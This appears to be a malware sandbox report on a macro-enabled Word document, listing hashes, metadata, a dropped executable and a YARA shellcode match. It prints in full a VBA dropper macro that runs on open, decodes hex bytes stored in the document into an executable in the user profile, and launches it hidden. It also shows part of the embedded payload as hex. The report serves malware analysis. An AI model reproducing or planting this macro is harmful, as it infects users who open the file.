bbcd452a4075

Filters:

File Name	Category	Type	Verdict	Actions

C:\Users\RDhJ0CNFevzX\Desktop\test-2.doc

Sample File

Word Document

MIME Type	application/vnd.ms-word.document.macroEnabled.12
File Size	23.53 KB
MD5	5b2b236d6e89deeac430258664d8d695
SHA1	7ba790eeee21a008722982dc1fca01ff3e7e3bb6
SHA256	bbcd452a40751882c23ac62aa322e378f59d6e15a2041400cf5d2e7af2ded1fe
SSDeep	384:/irhzg9+8J8EchisLu0e0+GW6teSVO/v0uM2iOiWMSXZcu/CEm+3XG9RjrH9NEvq:/bE8nGK0nzWAo0jOi98Ka8jb9NEv/Qh
ImpHash	-

File Reputation Information

Verdict	Malicious
Names	Mal/Generic-S

Office Information

Creator	Учетная запись Майкрософт
Last Modified By	administrator
Revision	15
Create Time	2020-07-24 16:18 (UTC+2)
Modify Time	2024-08-01 15:51 (UTC+2)
Application	Microsoft Office Word
App Version	16.0000
Template	Normal
Company	Home PC
Document Security	NONE
Editing Time	4.0
Page Count	6
Line Count	56
Paragraph Count	37
Word Count	11884
Character Count	6775
Chars With Spaces	18622
ScaleCrop	False
SharedDoc	False
language	ru-RU

VBA Macros (1)

Macro #1: NewMacros


                   Attribute VB_Name = "NewMacros"
Sub Auto_Open()
    Ppkhu12
End Sub

Sub Ppkhu12()
    Dim Ppkhu7 As Integer
    Dim Ppkhu1 As String
    Dim Ppkhu2 As String
    Dim Ppkhu3 As Integer
    Dim Ppkhu4 As Paragraph
    Dim Ppkhu8 As Integer
    Dim Ppkhu9 As Boolean
    Dim Ppkhu5 As Integer
    Dim Ppkhu11 As String
    Dim Ppkhu6 As Byte
    Dim Vhoxjtytrn As String
    Vhoxjtytrn = "Vhoxjtytrn"
    Ppkhu1 = "sowAvpiYaacf.exe"
    Ppkhu2 = Environ("USERPROFILE")
    ChDrive (Ppkhu2)
    ChDir (Ppkhu2)
    Ppkhu3 = FreeFile()
    Open Ppkhu1 For Binary As Ppkhu3
    For Each Ppkhu4 In ActiveDocument.Paragraphs
        DoEvents
            Ppkhu11 = Ppkhu4.Range.Text
        If (Ppkhu9 = True) Then
            Ppkhu8 = 1
            While (Ppkhu8 < Len(Ppkhu11))
                Ppkhu6 = Mid(Ppkhu11, Ppkhu8, 4)
                Put #Ppkhu3, , Ppkhu6
                Ppkhu8 = Ppkhu8 + 4
            Wend
        ElseIf (InStr(1, Ppkhu11, Vhoxjtytrn) > 0 And Len(Ppkhu11) > 0) Then
            Ppkhu9 = True
        End If
    Next
    Close #Ppkhu3
    Ppkhu13 (Ppkhu1)
End Sub

Sub Ppkhu13(Ppkhu10 As String)
    Dim Ppkhu7 As Integer
    Dim Ppkhu2 As String
    Ppkhu2 = Environ("USERPROFILE")
    ChDrive (Ppkhu2)
    ChDir (Ppkhu2)
    Ppkhu7 = Shell(Ppkhu10, vbHide)
End Sub

Sub AutoOpen()
    Auto_Open
End Sub

Sub Workbook_Open()
    Auto_Open
End Sub

Document Content Snippet

Test 31.08.2021 Test 17.08.2021Test-1 24.03.2021Test 17.03.2021Test 16.02.2021Test 11.02.2021test 04-03-2022 doctest 2022-09-02test 2023-08-24test 2023-08-30test 2024-08-01 testDATAVhoxjtytrn&H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H80&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H65&H2E&H0D&H0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H50&H45&H00&H00&H4C&H01&H03&H00&HE8&HDD&H41&H9F&H00&H00&H00&H00&H00&H00&H00&H00&HE0&H00&H0F&H03&H0B&H01&H02&H38&H00&H02&H00&H00&H00&H0E&H00&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H10&H00&H00&H00&H20&H00&H00&H00&H00&H40&H00&H00&H10&H00&H00&H00&H02&H00&H00&H04&H00&H00&H00&H01&H00&H00&H00&H04&H00&

C:\Users\RDhJ0CNFevzX\sowAvpiYaacf.exe

Dropped File

Binary

MIME Type	application/vnd.microsoft.portable-executable
File Size	4.50 KB
MD5	e057ac30184d3605cea31d1385bab050
SHA1	f79161de1901d8a6c07c61ff4fe71e21a30b9f21
SHA256	6f8c8ee8b1d514516268d888afa0ff4d6fb671b5e41bdc55853422674d4e50f2
SSDeep	48:65iIllvtp6LB6wCHOPda1B+jectgLVufx/srPC+5Gm2lgpNBe:UtfvtpHwXwv+KcteMfuVGtENI
ImpHash	f9ade0aa18f660a34a4fa23392e21838

File Reputation Information

Verdict

Malicious

PE Information

Image Base	0x00400000
Entry Point	0x00401000
Size Of Code	0x00000200
Size Of Initialized Data	0x00000E00
File Type	IMAGE_FILE_EXECUTABLE_IMAGE
Subsystem	IMAGE_SUBSYSTEM_WINDOWS_GUI
Machine Type	IMAGE_FILE_MACHINE_I386
Compile Timestamp	2054-09-01 18:46 (UTC+2)

Sections (3)

Name	Virtual Address	Virtual Size	Raw Data Size	Raw Data Offset	Flags	Entropy
.text	0x00401000	0x00000028	0x00000200	0x00000200	IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ	0.35
.data	0x00402000	0x00000A90	0x00000C00	0x00000400	IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE	7.49
.idata	0x00403000	0x00000064	0x00000200	0x00001000	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE	0.66

Imports (1)

KERNEL32.dll (1)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
ExitProcess	-	0x00403038	0x0000302C	0x0000102C	0x0000009C

Memory Dumps (4)

Name	Process ID	Start VA	End VA	Dump Reason	Bitness	Entry Point	Actions
sowavpiyaacf.exe	2	0x00400000	0x00403FFF	First Execution	32-bit	0x00401000	... Actions Go to Process Go to YARA Match Download Dump
buffer	2	0x0060D000	0x0060FFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
sowavpiyaacf.exe	2	0x00400000	0x00403FFF	First Network Behavior	32-bit	0x0040211B	... Actions Go to Process Go to YARA Match Download Dump
sowavpiyaacf.exe	2	0x00400000	0x00403FFF	Process Termination	32-bit	-	... Actions Go to Process Go to YARA Match Download Dump

YARA Matches (1)

Rule Name	Rule Description	Classification	Score	Actions
Shellcode_GetPC_fstenv	x86 GetPC code using fstenv; possible shellcode	-	3/5	... Actions Show Ruleset Show Match

c:\users\rdhj0cnfevzx\appdata\roaming\microsoft\uproof\custom.dic

Dropped File

Text

MIME Type	text/plain
File Size	30 Bytes
MD5	0354a4f77123833193da6ab14b67d8e9
SHA1	9629a6bf9442c80ae6acb388e75e547d2c8d6be9
SHA256	6bd46db44838dd06a6d189e1c77c69e2f4fed5a393567d8a47f6be5a04d2d581
SSDeep	3:Q37lNWflUY9:QRcNUY9
ImpHash	-

There are no files for this filter

There are no files in this analysis

Classifications

Threat Names

Before

After

WHOIS Domain Information